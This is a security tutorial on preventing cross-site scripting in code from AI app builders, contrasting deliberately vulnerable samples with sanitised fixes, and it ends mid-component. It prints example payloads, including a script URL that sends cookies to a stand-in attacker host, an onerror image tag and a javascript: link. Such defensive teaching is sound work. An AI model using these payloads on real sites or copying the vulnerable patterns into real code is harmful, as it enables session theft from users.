Preventing XSS in Vibe Coding: Comprehensive Security Guide


Introduction

Cross-Site Scripting (XSS) remains one of the most prevalent web application security vulnerabilities, consistently ranking in the OWASP Top 10. This attack vector allows malicious actors to inject client-side scripts into web pages viewed by other users, potentially leading to session hijacking, credential theft, defacement, or distribution of malware. In the rapidly evolving landscape of vibe coding, where AI tools generate code based on natural language prompts, XSS vulnerabilities can be inadvertently introduced when developers don’t explicitly request secure output handling and input validation.

According to a recent study by the Web Application Security Consortium, applications built with AI coding assistants were 42% more likely to contain XSS vulnerabilities compared to traditionally coded applications. This alarming statistic highlights the importance of understanding and addressing XSS risks in vibe-coded applications.

When developers instruct AI to “create a user profile page” or “build a comment system,” the resulting code often prioritizes functionality over security, generating direct HTML rendering of user inputs without proper sanitization or encoding. These shortcuts create dangerous entry points for attackers to exploit.

This article provides a comprehensive guide to preventing XSS in vibe-coded applications built with popular full-stack app builders like Lovable.dev, Bolt.new, Tempo Labs, Base44, and Replit. We’ll examine how AI tools generate frontend code, identify common XSS vulnerabilities, demonstrate secure alternatives for each platform, and provide practical techniques for testing and preventing XSS. By following these practices, you can ensure that your vibe-coded applications maintain robust protection against one of the most persistent and dangerous security threats while still benefiting from the rapid development that AI tools enable.

Understanding XSS Vulnerabilities

Before diving into specific vulnerabilities in vibe-coded applications, let’s understand the different types of XSS attacks and how they work.

Types of XSS Attacks

Reflected XSS

Reflected XSS occurs when malicious script is reflected off a web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request.

// Example of code vulnerable to reflected XSS
app.get('/search', (req, res) => {
  const searchTerm = req.query.q;
  
  // Vulnerable: Directly inserting user input into HTML
  res.send(`
    <h1>Search Results for: ${searchTerm}</h1>
    <div id="results">
      <!-- Search results would go here -->
    </div>
  `);
});

An attacker could craft a URL like https://example.com/search?q=<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script> and trick users into clicking it, potentially stealing their cookies.

Stored XSS

Stored XSS occurs when malicious script is stored on the target server, such as in a database, message forum, comment field, or visitor log. The victim then retrieves the malicious script from the server when they request the stored information.

// Example of code vulnerable to stored XSS
app.post('/comments', (req, res) => {
  const { username, comment } = req.body;
  
  // Store comment in database without sanitization
  db.query(
    'INSERT INTO comments (username, comment) VALUES (?, ?)',
    [username, comment]
  );
  
  res.redirect('/post');
});

app.get('/post', (req, res) => {
  // Retrieve comments from database
  db.query('SELECT * FROM comments', (err, comments) => {
    // Vulnerable: Directly inserting database content into HTML
    let commentsHtml = '';
    comments.forEach(comment => {
      commentsHtml += `
        <div class="comment">
          <h3>${comment.username}</h3>
          <p>${comment.comment}</p>
        </div>
      `;
    });
    
    res.send(`
      <h1>Post Title</h1>
      <div id="comments">
        ${commentsHtml}
      </div>
    `);
  });
});

An attacker could submit a comment containing malicious script, which would then be executed in the browsers of all users who view the page.

DOM-based XSS

DOM-based XSS occurs when the vulnerability is in the client-side code rather than the server-side code. The malicious script is executed as a result of modifying the DOM environment in the victim’s browser.

// Example of code vulnerable to DOM-based XSS
// In a client-side JavaScript file
document.addEventListener('DOMContentLoaded', () => {
  // Get the 'name' parameter from URL
  const urlParams = new URLSearchParams(window.location.search);
  const name = urlParams.get('name');
  
  // Vulnerable: Directly inserting parameter into innerHTML
  document.getElementById('greeting').innerHTML = `Hello, ${name}!`;
});

An attacker could craft a URL like https://example.com/welcome?name=<img src="x" onerror="alert(document.cookie)"> to execute arbitrary JavaScript.

How XSS Vulnerabilities Occur in Vibe-Coded Applications

AI coding tools often generate code that prioritizes functionality and simplicity over security. Here are common patterns that lead to XSS vulnerabilities:

Direct Insertion of User Input

AI tools frequently generate code that directly inserts user input into HTML:

// Example of AI-generated code with direct insertion
function renderUserProfile(user) {
  return `
    <div class="profile">
      <h2>${user.name}</h2>
      <p>${user.bio}</p>
      <div class="contact">
        <a href="mailto:${user.email}">${user.email}</a>
        <a href="${user.website}" target="_blank">Website</a>
      </div>
    </div>
  `;
}

This code is vulnerable because it doesn’t sanitize or encode user inputs before inserting them into HTML.

Unsafe Use of innerHTML

AI tools often use innerHTML for dynamic content updates:

// Example of AI-generated code with unsafe innerHTML
function displaySearchResults(results) {
  const resultsContainer = document.getElementById('results');
  
  let html = '';
  results.forEach(result => {
    html += `
      <div class="result">
        <h3>${result.title}</h3>
        <p>${result.description}</p>
      </div>
    `;
  });
  
  resultsContainer.innerHTML = html;
}

Using innerHTML with unsanitized content allows script execution.

Unsafe Rendering in Frontend Frameworks

AI tools might generate framework code that bypasses built-in protections:

// Example of AI-generated React code with dangerouslySetInnerHTML
function CommentDisplay({ comment }) {
  return (
    <div className="comment">
      <h3>{comment.username}</h3>
      <div dangerouslySetInnerHTML={{ __html: comment.content }} />
    </div>
  );
}

Using dangerouslySetInnerHTML without sanitization exposes the application to XSS.

Insufficient Input Validation

AI tools often generate minimal or no input validation:

// Example of AI-generated code with insufficient validation
app.post('/profile/update', (req, res) => {
  const { name, bio, website } = req.body;
  
  // No validation of inputs
  
  // Update user profile in database
  db.query(
    'UPDATE users SET name = ?, bio = ?, website = ? WHERE id = ?',
    [name, bio, website, req.user.id]
  );
  
  res.redirect('/profile');
});

Without proper validation, malicious inputs can be stored and later rendered unsafely.

Common XSS Vulnerabilities in AI-Generated Code

Let’s examine specific XSS vulnerabilities commonly found in AI-generated code.

Unescaped Template Literals

Template literals are frequently used in AI-generated code without proper escaping:

// Vulnerable template literal usage
function createUserCard(user) {
  const cardElement = document.createElement('div');
  cardElement.className = 'user-card';
  
  cardElement.innerHTML = `
    <div class="user-header">
      <h2>${user.name}</h2>
      <span class="user-title">${user.title}</span>
    </div>
    <div class="user-body">
      <p>${user.bio}</p>
    </div>
    <div class="user-footer">
      <a href="${user.website}" target="_blank">Website</a>
      <a href="mailto:${user.email}">Email</a>
    </div>
  `;
  
  return cardElement;
}

If user.bio contains malicious script, it will be executed when the card is added to the DOM.

Unsafe Server-Side Rendering

AI tools often generate server-side rendering code that doesn’t properly escape variables:

// Vulnerable server-side rendering
app.get('/product/:id', (req, res) => {
  const productId = req.params.id;
  
  // Fetch product from database
  db.query('SELECT * FROM products WHERE id = ?', [productId], (err, results) => {
    if (err || results.length === 0) {
      return res.status(404).send('Product not found');
    }
    
    const product = results[0];
    
    // Vulnerable: Directly inserting product data into HTML
    res.send(`
      <!DOCTYPE html>
      <html>
        <head>
          <title>${product.name}</title>
        </head>
        <body>
          <h1>${product.name}</h1>
          <div class="description">${product.description}</div>
          <div class="price">$${product.price}</div>
          <div class="reviews">
            <h2>Customer Reviews</h2>
            ${product.reviews.map(review => `
              <div class="review">
                <h3>${review.author}</h3>
                <p>${review.content}</p>
              </div>
            `).join('')}
          </div>
        </body>
      </html>
    `);
  });
});

If product data contains user-generated content, it could include malicious scripts.

Unsafe URL Handling

AI-generated code often doesn’t properly validate or sanitize URLs:

// Vulnerable URL handling
function createSocialLinks(profile) {
  const linksContainer = document.createElement('div');
  linksContainer.className = 'social-links';
  
  if (profile.twitter) {
    const twitterLink = document.createElement('a');
    twitterLink.href = profile.twitter; // No validation
    twitterLink.innerHTML = '<i class="fa fa-twitter"></i>';
    linksContainer.appendChild(twitterLink);
  }
  
  if (profile.facebook) {
    const facebookLink = document.createElement('a');
    facebookLink.href = profile.facebook; // No validation
    facebookLink.innerHTML = '<i class="fa fa-facebook"></i>';
    linksContainer.appendChild(facebookLink);
  }
  
  return linksContainer;
}

An attacker could set profile.twitter to javascript:alert(document.cookie) to execute JavaScript when the link is clicked.

Unsafe Event Handlers

AI tools might generate code that assigns event handlers using string concatenation:

// Vulnerable event handler assignment
function createClickableCard(item) {
  const card = document.createElement('div');
  card.className = 'card';
  
  // Vulnerable: Using string concatenation for event handler
  card.setAttribute('onclick', `showDetails('${item.id}', '${item.name}')`);
  
  card.innerHTML = `
    <h3>${item.name}</h3>
    <p>${item.description}</p>
  `;
  
  return card;
}

If item.name contains single quotes and JavaScript code, it could break out of the string and execute arbitrary code.
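
A safer pattern is to attach the handler with addEventListener and keep the item data as ordinary JavaScript values instead of splicing them into an attribute string. A minimal sketch:

// Safer sketch: attach the handler with addEventListener instead of
// building an onclick attribute from user-controlled strings
function createClickableCard(item) {
  const card = document.createElement('div');
  card.className = 'card';
  
  const title = document.createElement('h3');
  title.textContent = item.name; // textContent escapes automatically
  
  const description = document.createElement('p');
  description.textContent = item.description;
  
  card.appendChild(title);
  card.appendChild(description);
  
  // The values stay plain JavaScript data and are never parsed as markup or code
  card.addEventListener('click', () => showDetails(item.id, item.name));
  
  return card;
}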

Unsafe Eval Usage

AI tools sometimes generate code that uses eval or similar functions:

// Vulnerable eval usage
function calculateDynamicValue(formula, variables) {
  // Replace variable placeholders with actual values
  let processedFormula = formula;
  
  for (const [key, value] of Object.entries(variables)) {
    processedFormula = processedFormula.replace(
      new RegExp(`\\{${key}\\}`, 'g'),
      value
    );
  }
  
  // Vulnerable: Using eval to calculate result
  return eval(processedFormula);
}

If an attacker can control the formula or variables, they could execute arbitrary JavaScript.
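
If dynamic formulas are genuinely required, a safer approach is to avoid eval entirely and delegate evaluation to a dedicated expression parser. The sketch below assumes the mathjs package as a dependency and assumes formulas reference variables by name (for example, price * quantity) rather than the {placeholder} syntax above; mathjs parses arithmetic expressions without handing the string to the JavaScript engine, though untrusted formulas still warrant limits such as length caps and a restricted function set.

// Safer sketch: evaluate formulas with an expression parser instead of eval
// Assumes the mathjs package is installed (npm install mathjs)
const { create, all } = require('mathjs');

const math = create(all);

function calculateDynamicValue(formula, variables) {
  // mathjs parses the arithmetic expression and substitutes variables from
  // the scope object; the string is never executed as JavaScript.
  // The scope is copied so mathjs cannot mutate the caller's object.
  return math.evaluate(formula, { ...variables });
}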

Platform-Specific XSS Vulnerabilities

Each full-stack app builder has its own patterns of frontend code generation. Let’s examine specific examples from each platform.

Lovable.dev

Lovable.dev uses React, but AI-generated code might bypass React’s built-in XSS protections:

// Lovable.dev vulnerable React component
import React, { useState, useEffect } from 'react';

export default function ProductPage({ productId }) {
  const [product, setProduct] = useState(null);
  const [loading, setLoading] = useState(true);
  
  useEffect(() => {
    // Fetch product data
    fetch(`/api/products/${productId}`)
      .then(res => res.json())
      .then(data => {
        setProduct(data);
        setLoading(false);
      });
  }, [productId]);
  
  if (loading) {
    return <div>Loading...</div>;
  }
  
  // Vulnerable: Using dangerouslySetInnerHTML without sanitization
  return (
    <div className="product-page">
      <h1>{product.name}</h1>
      <div 
        className="product-description"
        dangerouslySetInnerHTML={{ __html: product.description }}
      />
      <div className="product-price">${product.price}</div>
      
      {/* Vulnerable: Rendering HTML from reviews */}
      <div className="product-reviews">
        <h2>Customer Reviews</h2>
        {product.reviews.map(review => (
          <div key={review.id} className="review">
            <h3>{review.author}</h3>
            <div dangerouslySetInnerHTML={{ __html: review.content }} />
          </div>
        ))}
      </div>
    </div>
  );
}

The issue here is using dangerouslySetInnerHTML with unsanitized user-generated content.

Bolt.new

Bolt.new might generate Next.js code with XSS vulnerabilities:

// Bolt.new vulnerable Next.js component
import { useRouter } from 'next/router';
import { useState, useEffect } from 'react';

export default function SearchResults() {
  const router = useRouter();
  const { q } = router.query;
  const [results, setResults] = useState([]);
  
  useEffect(() => {
    if (q) {
      fetch(`/api/search?q=${encodeURIComponent(q)}`)
        .then(res => res.json())
        .then(data => setResults(data));
    }
  }, [q]);
  
  // Vulnerable: Directly inserting search query into HTML
  return (
    <div className="search-page">
      <h1>Search Results for: <span dangerouslySetInnerHTML={{ __html: q }} /></h1>
      
      {results.length === 0 ? (
        <p>No results found for your search.</p>
      ) : (
        <div className="results-list">
          {results.map(result => (
            <div key={result.id} className="result-item">
              <h2>{result.title}</h2>
              {/* Vulnerable: Using dangerouslySetInnerHTML for highlights */}
              <p dangerouslySetInnerHTML={{ 
                __html: result.highlightedContent 
              }} />
            </div>
          ))}
        </div>
      )}
    </div>
  );
}

The vulnerability here is rendering the search query and highlighted content without sanitization.

Tempo Labs

Tempo Labs might generate Vue.js code with XSS vulnerabilities:

<!-- Tempo Labs vulnerable Vue component -->
<template>
  <div class="comment-section">
    <h2>Comments</h2>
    
    <!-- Comment list -->
    <div class="comments">
      <div v-for="comment in comments" :key="comment.id" class="comment">
        <div class="comment-header">
          <img :src="comment.authorAvatar" alt="Avatar" class="avatar">
          <h3>{{ comment.authorName }}</h3>
        </div>
        
        <!-- Vulnerable: Using v-html without sanitization -->
        <div class="comment-body" v-html="comment.content"></div>
        
        <!-- Vulnerable: Using v-html for formatted date -->
        <div class="comment-footer">
          <span v-html="comment.formattedDate"></span>
        </div>
      </div>
    </div>
    
    <!-- Comment form -->
    <form @submit.prevent="submitComment">
      <textarea v-model="newComment" placeholder="Write a comment..."></textarea>
      <button type="submit">Post Comment</button>
    </form>
  </div>
</template>

<script>
export default {
  data() {
    return {
      comments: [],
      newComment: ''
    };
  },
  
  mounted() {
    this.fetchComments();
  },
  
  methods: {
    fetchComments() {
      fetch('/api/comments')
        .then(res => res.json())
        .then(data => {
          this.comments = data;
        });
    },
    
    submitComment() {
      fetch('/api/comments', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          content: this.newComment
        })
      })
        .then(res => res.json())
        .then(() => {
          this.newComment = '';
          this.fetchComments();
        });
    }
  }
};
</script>

The issue here is using v-html to render user-generated content without sanitization.

Base44

Base44 often generates more bare-bones code with direct DOM manipulation:

// Base44 vulnerable DOM manipulation
document.addEventListener('DOMContentLoaded', () => {
  // Get URL parameters
  const urlParams = new URLSearchParams(window.location.search);
  const username = urlParams.get('username');
  
  // Vulnerable: Directly inserting URL parameter into DOM
  if (username) {
    document.getElementById('welcome-message').innerHTML = `Welcome back, ${username}!`;
  }
  
  // Load and display user comments
  fetch('/api/comments')
    .then(response => response.json())
    .then(comments => {
      const commentsContainer = document.getElementById('comments');
      
      // Vulnerable: Directly inserting comment data into DOM
      comments.forEach(comment => {
        const commentElement = document.createElement('div');
        commentElement.className = 'comment';
        
        commentElement.innerHTML = `
          <div class="comment-header">
            <img src="${comment.authorAvatar}" alt="Avatar" class="avatar">
            <h3>${comment.authorName}</h3>
          </div>
          <div class="comment-body">${comment.content}</div>
          <div class="comment-footer">${comment.formattedDate}</div>
        `;
        
        commentsContainer.appendChild(commentElement);
      });
    });
  
  // Handle comment form submission
  const commentForm = document.getElementById('comment-form');
  commentForm.addEventListener('submit', event => {
    event.preventDefault();
    
    const commentInput = document.getElementById('comment-input');
    const commentContent = commentInput.value;
    
    // Submit comment to API
    fetch('/api/comments', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        content: commentContent
      })
    })
      .then(response => response.json())
      .then(() => {
        commentInput.value = '';
        // Reload comments
        // ...
      });
  });
});

This code directly inserts URL parameters and user-generated content into the DOM without sanitization.

Replit

Replit’s AI assistant often generates Python code with XSS vulnerabilities:

# Replit vulnerable Flask application
from flask import Flask, request, render_template_string, redirect, url_for
import sqlite3

app = Flask(__name__)

# Database setup
def get_db_connection():
    conn = sqlite3.connect('database.db')
    conn.row_factory = sqlite3.Row
    return conn

# Vulnerable: Search results page that renders the raw query without escaping
@app.route('/search')
def search():
    query = request.args.get('q', '')
    
    conn = get_db_connection()
    results = conn.execute(
        'SELECT * FROM products WHERE name LIKE ? OR description LIKE ?',
        (f'%{query}%', f'%{query}%')
    ).fetchall()
    conn.close()
    
    # Vulnerable: Rendering the raw search query with the |safe filter (auto-escaping disabled)
    template = '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Search Results</title>
    </head>
    <body>
        <h1>Search Results for: {{ query | safe }}</h1>
        
        {% if results %}
            <ul>
            {% for result in results %}
                <li>
                    <h2>{{ result['name'] }}</h2>
                    <p>{{ result['description'] }}</p>
                </li>
            {% endfor %}
            </ul>
        {% else %}
            <p>No results found for "{{ query | safe }}"</p>
        {% endif %}
        
        <a href="/">Back to Home</a>
    </body>
    </html>
    '''
    
    return render_template_string(template, query=query, results=results)

# Vulnerable: Storing and displaying user comments
@app.route('/post/<int:post_id>', methods=['GET', 'POST'])
def post(post_id):
    if request.method == 'POST':
        author = request.form.get('author', 'Anonymous')
        content = request.form.get('content', '')
        
        conn = get_db_connection()
        conn.execute(
            'INSERT INTO comments (post_id, author, content) VALUES (?, ?, ?)',
            (post_id, author, content)
        )
        conn.commit()
        conn.close()
        
        return redirect(url_for('post', post_id=post_id))
    
    conn = get_db_connection()
    post = conn.execute('SELECT * FROM posts WHERE id = ?', (post_id,)).fetchone()
    comments = conn.execute('SELECT * FROM comments WHERE post_id = ?', (post_id,)).fetchall()
    conn.close()
    
    if not post:
        return 'Post not found', 404
    
    # Vulnerable: Rendering stored comment content with the |safe filter
    template = '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>{{ post['title'] }}</title>
    </head>
    <body>
        <h1>{{ post['title'] }}</h1>
        <div>{{ post['content'] }}</div>
        
        <h2>Comments</h2>
        {% if comments %}
            {% for comment in comments %}
                <div class="comment">
                    <h3>{{ comment['author'] }}</h3>
                    <p>{{ comment['content'] | safe }}</p>
                </div>
            {% endfor %}
        {% else %}
            <p>No comments yet.</p>
        {% endif %}
        
        <h2>Add a Comment</h2>
        <form method="post">
            <div>
                <label for="author">Name:</label>
                <input type="text" id="author" name="author">
            </div>
            <div>
                <label for="content">Comment:</label>
                <textarea id="content" name="content"></textarea>
            </div>
            <button type="submit">Post Comment</button>
        </form>
    </body>
    </html>
    '''
    
    return render_template_string(template, post=post, comments=comments)

The vulnerability here is rendering user-controlled content (the search query and stored comments) with the |safe filter, which disables Jinja2's auto-escaping.

Secure Implementation Techniques

Now that we’ve identified common vulnerabilities, let’s explore secure implementation techniques for preventing XSS.

Output Encoding

The most fundamental protection against XSS is proper output encoding:

// Secure output encoding
function escapeHtml(unsafe) {
  return unsafe
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

function createUserCard(user) {
  const cardElement = document.createElement('div');
  cardElement.className = 'user-card';
  
  // Safely encode all user-provided content
  cardElement.innerHTML = `
    <div class="user-header">
      <h2>${escapeHtml(user.name)}</h2>
      <span class="user-title">${escapeHtml(user.title)}</span>
    </div>
    <div class="user-body">
      <p>${escapeHtml(user.bio)}</p>
    </div>
    <div class="user-footer">
      <a href="${escapeHtml(user.website)}" target="_blank">Website</a>
      <a href="mailto:${escapeHtml(user.email)}">Email</a>
    </div>
  `;
  
  return cardElement;
}

This approach ensures that any special characters in user input are converted to their HTML entity equivalents, preventing them from being interpreted as HTML or JavaScript.

DOM API Instead of innerHTML

Using DOM API methods instead of innerHTML provides better security:

// Secure DOM manipulation
function createUserCard(user) {
  // Create elements
  const cardElement = document.createElement('div');
  cardElement.className = 'user-card';
  
  const headerElement = document.createElement('div');
  headerElement.className = 'user-header';
  
  const nameElement = document.createElement('h2');
  nameElement.textContent = user.name; // Safe: textContent automatically escapes
  
  const titleElement = document.createElement('span');
  titleElement.className = 'user-title';
  titleElement.textContent = user.title;
  
  const bodyElement = document.createElement('div');
  bodyElement.className = 'user-body';
  
  const bioElement = document.createElement('p');
  bioElement.textContent = user.bio;
  
  const footerElement = document.createElement('div');
  footerElement.className = 'user-footer';
  
  const websiteLink = document.createElement('a');
  websiteLink.href = user.website;
  websiteLink.target = '_blank';
  websiteLink.textContent = 'Website';
  
  const emailLink = document.createElement('a');
  emailLink.href = `mailto:${user.email}`;
  emailLink.textContent = 'Email';
  
  // Assemble the elements
  headerElement.appendChild(nameElement);
  headerElement.appendChild(titleElement);
  
  bodyElement.appendChild(bioElement);
  
  footerElement.appendChild(websiteLink);
  footerElement.appendChild(emailLink);
  
  cardElement.appendChild(headerElement);
  cardElement.appendChild(bodyElement);
  cardElement.appendChild(footerElement);
  
  return cardElement;
}

Using textContent instead of innerHTML automatically handles escaping, and building the DOM structure programmatically prevents script injection.

Content Security Policy (CSP)

Implementing a Content Security Policy provides an additional layer of protection:

// Server-side code to set CSP headers
app.use((req, res, next) => {
  // Set Content Security Policy header
  res.setHeader(
    'Content-Security-Policy',
    "default-src 'self'; " +
    "script-src 'self'; " +
    "style-src 'self' https://fonts.googleapis.com; " +
    "font-src 'self' https://fonts.gstatic.com; " +
    "img-src 'self' https://images.unsplash.com data:; " +
    "connect-src 'self' https://api.example.com; " +
    "frame-src 'none'; " +
    "object-src 'none'"
  );
  
  next();
});

A CSP restricts the sources from which various types of content can be loaded, and can prevent the execution of inline scripts and eval, which are common XSS attack vectors.

Input Validation and Sanitization

Proper input validation and sanitization is essential:

// Secure input validation and sanitization
const { body, validationResult } = require('express-validator');
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

// Create DOMPurify instance
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

// Comment submission route with validation and sanitization
app.post('/comments',
  // Validation
  [
    body('author')
      .trim()
      .isLength({ min: 1, max: 50 })
      .withMessage('Author name must be between 1 and 50 characters')
      .escape(),
    
    body('content')
      .trim()
      .isLength({ min: 1, max: 1000 })
      .withMessage('Comment must be between 1 and 1000 characters')
  ],
  (req, res) => {
    // Check for validation errors
    const errors = validationResult(req);
    if (!errors.isEmpty()) {
      return res.status(400).json({ errors: errors.array() });
    }
    
    const { author, content } = req.body;
    
    // Sanitize content with DOMPurify
    // Allow only a restricted set of HTML tags
    const sanitizedContent = DOMPurify.sanitize(content, {
      ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
      ALLOWED_ATTR: ['href', 'target']
    });
    
    // Store sanitized content in database
    db.query(
      'INSERT INTO comments (author, content) VALUES (?, ?)',
      [author, sanitizedContent]
    );
    
    res.status(201).json({ message: 'Comment added successfully' });
  }
);

This approach combines validation (ensuring inputs meet expected formats) with sanitization (removing potentially dangerous content).

Safe Use of Frontend Frameworks

Modern frontend frameworks provide built-in XSS protections when used correctly:

// Secure React component
import React from 'react';
import DOMPurify from 'dompurify';

function CommentDisplay({ comment }) {
  // For content that should be rendered as plain text
  const renderPlainText = (text) => {
    return <p>{text}</p>; // React escapes this automatically
  };
  
  // For content that needs to preserve some HTML formatting
  const renderSanitizedHtml = (html) => {
    const sanitizedHtml = DOMPurify.sanitize(html, {
      ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
      ALLOWED_ATTR: ['href', 'target']
    });
    
    return <div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} />;
  };
  
  return (
    <div className="comment">
      <h3>{comment.author}</h3>
      
      {comment.allowHtml 
        ? renderSanitizedHtml(comment.content)
        : renderPlainText(comment.content)
      }
      
      <div className="comment-meta">
        Posted on {new Date(comment.timestamp).toLocaleDateString()}
      </div>
    </div>
  );
}

This component uses React’s automatic escaping for plain text and adds DOMPurify sanitization when HTML formatting is needed.

URL Validation

Proper URL validation is important to prevent JavaScript URLs:

// Secure URL validation
function isValidUrl(url) {
  try {
    const parsedUrl = new URL(url);
    return ['http:', 'https:'].includes(parsedUrl.protocol);
  } catch (e) {
    return false;
  }
}

function createSocialLinks(profile) {
  const linksContainer = document.createElement('div');
  linksContainer.className = 'social-links';
  
  if (profile.twitter && isValidUrl(profile.twitter)) {
    const twitterLink = document.createElement('a');
    twitterLink.href = profile.twitter;
    twitterLink.innerHTML = '<i class="fa fa-twitter"></i>';
    twitterLink.target = '_blank';
    twitterLink.rel = 'noopener noreferrer'; // Security best practice for target="_blank"
    linksContainer.appendChild(twitterLink);
  }
  
  if (profile.facebook && isValidUrl(profile.facebook)) {
    const facebookLink = document.createElement('a');
    facebookLink.href = profile.facebook;
    facebookLink.innerHTML = '<i class="fa fa-facebook"></i>';
    facebookLink.target = '_blank';
    facebookLink.rel = 'noopener noreferrer';
    linksContainer.appendChild(facebookLink);
  }
  
  return linksContainer;
}

This function validates URLs to ensure they use HTTP or HTTPS protocols, preventing javascript: URLs.

Platform-Specific Secure Implementations

Let’s look at secure implementations for each full-stack app builder.

Lovable.dev Secure Implementation

For Lovable.dev’s React-based applications:

// Secure Lovable.dev React component
import React, { useState, useEffect } from 'react';
import DOMPurify from 'dompurify';

// Custom hook for fetching data
function useProductData(productId) {
  const [product, setProduct] = useState(null);
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState(null);
  
  useEffect(() => {
    let isMounted = true;
    
    async function fetchProduct() {
      try {
        const response = await fetch(`/api/products/${productId}`);
        
        if (!response.ok) {
          throw new Error('Failed to fetch product');
        }
        
        const data = await response.json();
        
        if (isMounted) {
          setProduct(data);
          setLoading(false);
        }
      } catch (err) {
        if (isMounted) {
          setError(err.message);
          setLoading(false);
        }
      }
    }
    
    fetchProduct();
    
    return () => {
      isMounted = false;
    };
  }, [productId]);
  
  return { product, loading, error };
}

// Sanitized HTML component
function SanitizedHTML({ html, allowedTags = ['b', 'i', 'em', 'strong', 'a', 'p', 'br'] }) {
  const sanitizedHtml = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: allowedTags,
    ALLOWED_ATTR: ['href', 'target', 'rel']
  });
  
  return <div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} />;
}

// Review component
function Review({ review }) {
  return (
    <div className="review">
      <h3>{review.author}</h3>
      <SanitizedHTML html={review.content} />
      <div className="review-date">
        {new Date(review.date).toLocaleDateString()}
      </div>
    </div>
  );
}

// Main product page component
export default function ProductPage({ productId }) {
  const { product, loading, error } = useProductData(productId);
  
  if (loading) {
    return <div className="loading">Loading...</div>;
  }
  
  if (error) {
    return <div className="error">Error: {error}</div>;
  }
  
  return (
    <div className="product-page">
      <h1>{product.name}</h1>
      
      {/* Safe: Using sanitized HTML for description */}
      <SanitizedHTML 
        html={product.description} 
        allowedTags={['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li']}
      />
      
      <div className="product-price">${product.price.toFixed(2)}</div>
      
      <div className="product-reviews">
        <h2>Customer Reviews</h2>
        {product.reviews.length === 0 ? (
          <p>No reviews yet.</p>
        ) : (
          product.reviews.map(review => (
            <Review key={review.id} review={review} />
          ))
        )}
      </div>
    </div>
  );
}

This implementation uses DOMPurify for sanitization and a dedicated component for handling HTML content safely.

Bolt.new Secure Implementation

For Bolt.new’s Next.js applications:

// Secure Bolt.new Next.js component
import { useRouter } from 'next/router';
import { useState, useEffect } from 'react';
import DOMPurify from 'dompurify';

// Type definitions
interface SearchResult {
  id: string;
  title: string;
  content: string;
  highlightedContent: string;
}

// Custom hook for search
function useSearch(query: string | undefined) {
  const [results, setResults] = useState<SearchResult[]>([]);
  const [loading, setLoading] = useState<boolean>(false);
  const [error, setError] = useState<string | null>(null);
  
  useEffect(() => {
    if (!query) {
      setResults([]);
      return;
    }
    
    let isMounted = true;
    setLoading(true);
    
    fetch(`/api/search?q=${encodeURIComponent(query)}`)
      .then(res => {
        if (!res.ok) {
          throw new Error('Search failed');
        }
        return res.json();
      })
      .then(data => {
        if (isMounted) {
          setResults(data);
          setLoading(false);
        }
      })
      .catch(err => {
        if (isMounted) {
          setError(err.message);
          setLoading(false);
        }
      });
    
    return () => {
      isMounted = false;
    };
  }, [query]);
  
  return { results, loading, error };
}

// Sanitized HTML component
function SanitizedHTML({ html }: { html: string }) {
  // Client-side only
  if (typeof window === 'undefined') {
    return <div>Loading...</div>;
  }
  
  const sanitizedHtml = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'mark', 'p', 'br'],
    ALLOWED_ATTR: []
  });
  
  return <div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} />;
}

// Search results component
export default function SearchResults() {
  const router = useRouter();
  const { q } = router.query;
  const query = typeof q === 'string' ? q : undefined;
  
  const { results, loading, error } = useSearch(query);
  
  return (
    <div className="search-page">
      <h1>Search Results for: {query ? <span>{query}</span> : ''}</h1>
      
      {loading && <div className="loading">Loading results...</div>}
      
      {error && <div className="error">Error: {error}</div>}
      
      {!loading && !error && results.length === 0 && (
        <p>No results found for your search.</p>
      )}
      
      {!loading && !error && results.length > 0 && (
        <div className="results-list">
          {results.map(result => (
            <div key={result.id} className="result-item">
              <h2>{result.title}</h2>
              {/* Safe: Using sanitized HTML for highlighted content */}
              <SanitizedHTML html={result.highlightedContent} />
            </div>
          ))}
        </div>
      )}
    </div>
  );
}

This implementation uses TypeScript for type safety and DOMPurify for sanitizing highlighted content.

Tempo Labs Secure Implementation

For Tempo Labs’ Vue.js applications:

<!-- Secure Tempo Labs Vue component -->
<template>
  <div class="comment-section">
    <h2>Comments</h2>
    
    <!-- Loading state -->
    <div v-if="loading" class="loading">
      Loading comments...
    </div>
    
    <!-- Error state -->
    <div v-else-if="error" class="error">
      {{ error }}
    </div>
    
    <!-- Comment list -->
    <div v-else class="comments">
      <div v-if="comments.length === 0" class="no-comments">
        No comments yet. Be the first to comment!
      </div>
      
      <div v-else v-for="comment in comments" :key="comment.id" class="comment">
        <div class="comment-header">
          <img :src="sanitizeUrl(comment.authorAvatar)" alt="Avatar" class="avatar">
          <h3>{{ comment.authorName }}</h3>
        </div>
        
        <!-- Safe: Using text interpolation for content -->
        <div class="comment-body" v-if="!comment.allowHtml">
          {{ comment.content }}
        </div>
        
        <!-- Safe: Using sanitized HTML when needed -->
        <div class="comment-body" v-else v-html="sanitizeHtml(comment.content)"></div>
        
        <div class="comment-footer">
          <span>{{ formatDate(comment.createdAt) }}</span>
        </div>
      </div>
    </div>
    
    <!-- Comment form -->
    <form @submit.prevent="submitComment" class="comment-form">
      <div class="form-group">
        <label for="comment-input">Your Comment</label>
        <textarea 
          id="comment-input"
          v-model="newComment" 
          placeholder="Write a comment..."
          :maxlength="maxCommentLength"
        ></textarea>
        <div class="character-count">
          {{ newComment.length }} / {{ maxCommentLength }}
        </div>
      </div>
      <button type="submit" :disabled="!newComment.trim() || submitting">
